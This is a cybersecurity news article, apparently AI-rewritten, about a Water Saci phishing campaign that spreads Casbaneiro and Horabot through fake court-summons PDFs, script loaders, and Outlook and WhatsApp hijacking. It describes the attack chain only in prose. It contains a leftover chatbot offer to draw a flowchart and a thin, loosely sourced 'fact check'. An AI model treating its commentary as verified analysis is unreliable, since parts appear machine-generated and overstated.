Listen to this Post
A sophisticated phishing campaign is currently targeting Spanish-speaking users across Latin America and Europe, aiming to distribute powerful banking trojans like Casbaneiro (also known as Metamorfo) using a secondary malware called Horabot. This campaign, orchestrated by the Brazilian cybercrime group tracked as Augmented Marauder and Water Saci, represents a new level of coordination and complexity in regional cybercrime. First documented by Trend Micro in October 2025, the group has expanded its tactics to combine social engineering, WhatsApp automation, and email hijacking techniques to infiltrate both consumer and enterprise systems.
Overview of the Campaign
The attack typically begins with a phishing email disguised as a court summons, tricking recipients into opening a password-protected PDF attachment. Inside the PDF, an embedded link triggers the automatic download of a ZIP archive containing HTML Application (HTA) and Visual Basic Script (VBS) payloads. The VBS script performs anti-analysis checks, including antivirus detection, before retrieving additional payloads from remote servers. Among these payloads are AutoIt-based loaders, which execute encrypted files to deploy two malware families: Casbaneiro (“staticdata.dll”) and Horabot (“at.dll”).
Casbaneiro serves as the primary malware, contacting a command-and-control server to fetch a PowerShell script that leverages Horabot to spread itself through phishing emails sent from infected users’ Microsoft Outlook accounts. Unlike older campaigns, this script dynamically generates password-protected PDFs impersonating Spanish judicial summonses, tailoring each phishing attempt to the victim.
Horabot also functions as a spam and account-hijacking tool, targeting Yahoo, Live, and Gmail accounts to distribute malware further. This dual-pronged approach has allowed the attackers to penetrate enterprise networks in Europe while simultaneously targeting retail and consumer users in Latin America via WhatsApp automation.
Historical Context of Water Saci Operations
Water Saci has a documented history of using WhatsApp Web to distribute banking trojans like Maverick and Casbaneiro in a worm-like fashion. Recent campaigns, highlighted by Kaspersky, incorporate ClickFix social engineering tactics to trick users into executing malicious HTA files, which ultimately install Casbaneiro and activate the Horabot propagation mechanism. The combination of dynamic PDF generation, WhatsApp-based delivery, and email hijacking demonstrates the group’s adaptability and technological sophistication.
What Undercode Says:
Advanced Social Engineering Tactics
The integration of court summons PDFs, ClickFix social engineering, and WhatsApp-based malware dissemination shows that this threat actor understands human behavior deeply. They exploit authority, urgency, and familiarity, which makes these phishing emails highly effective against unsuspecting users.
Multi-Layered Malware Infrastructure
By using Horabot as a propagation tool and Casbaneiro as the primary payload, Water Saci separates distribution from core infection. This modular design allows for flexible attacks and easier evasion of endpoint detection systems, demonstrating a level of planning typical of state-level cybercrime groups.
Dynamic Malware Generation
The automated creation of bespoke, password-protected PDFs per victim shows an agile adversary capable of real-time adaptation. This reduces the risk of static detection, making traditional signature-based antivirus solutions largely ineffective.
Cross-Regional Targeting
While Latin American users are the main targets for WhatsApp-based attacks, the campaign simultaneously infiltrates European enterprises via email-based Horabot attacks. This bifurcated strategy illustrates the group’s operational maturity and ability to manage geographically diverse campaigns concurrently.
Exploitation of Common Productivity Tools
Targeting Microsoft Outlook for spreading phishing emails and leveraging legitimate email APIs increases the perceived legitimacy of the messages. By compromising trusted productivity tools, the attackers maximize reach while reducing suspicion from victims and automated monitoring systems.
Persistent Threat Evolution
The threat actor has evolved from using simple worm-like WhatsApp distribution to a complex blend of automation, dynamic content generation, and multi-vector email phishing. This trend signals that attackers are increasingly investing in adaptive infrastructures capable of bypassing modern cybersecurity defenses.
Implications for Enterprises
Organizations with European operations are particularly vulnerable to Horabot-based attacks. Enterprise networks often harbor sensitive data that, if exfiltrated, could result in substantial financial and reputational damage. This campaign underscores the need for advanced endpoint protection and user education programs.
Consumer-Level Risks
Consumers in Latin America face persistent threats via WhatsApp and ClickFix methods. Since these attacks exploit social trust, even tech-savvy users may fall victim if they overlook subtle red flags, highlighting the importance of multi-factor authentication and cautious handling of unsolicited messages.
Threat Actor Reputation and Capabilities
Water Saci’s combination of automation, social engineering, and modular malware distribution aligns with characteristics seen in organized cybercrime collectives. Their ability to maintain long-term campaigns demonstrates operational resilience and resource availability, indicating high-level planning and coordination.
Defensive Recommendations
Defensive strategies should focus on isolating email-based malware propagation, deploying behavior-based threat detection, and monitoring for unusual outbound communication patterns. User training emphasizing verification of attachments and links is equally essential to mitigate risks.
🔍 Fact Checker Results:
✅ Water Saci has a documented history of WhatsApp-based malware distribution.
✅ Casbaneiro and Horabot are confirmed banking malware used in Latin America and Europe.
❌ No evidence suggests the malware has caused direct physical harm; its primary impact is financial and data theft.
📊 Prediction:
The sophistication of this campaign suggests that Water Saci will continue refining multi-vector attacks, potentially expanding to additional regions. Organizations should anticipate more dynamic phishing techniques, with further use of automated social engineering on messaging platforms and enterprise email systems. Enhanced monitoring, AI-based threat detection, and region-specific security awareness programs are likely to be critical in preventing future breaches.
If you want, I can also produce a visually engaging flowchart of the attack sequence for this campaign—it would make understanding the multiple malware stages much easier. Do you want me to do that?
🕵️📝✔️Let’s dive deep and fact‑check.
References:
Reported By: thehackernews.com
Extra Source Hub (Possible Sources for article):
https://stackoverflow.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
Bing
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon
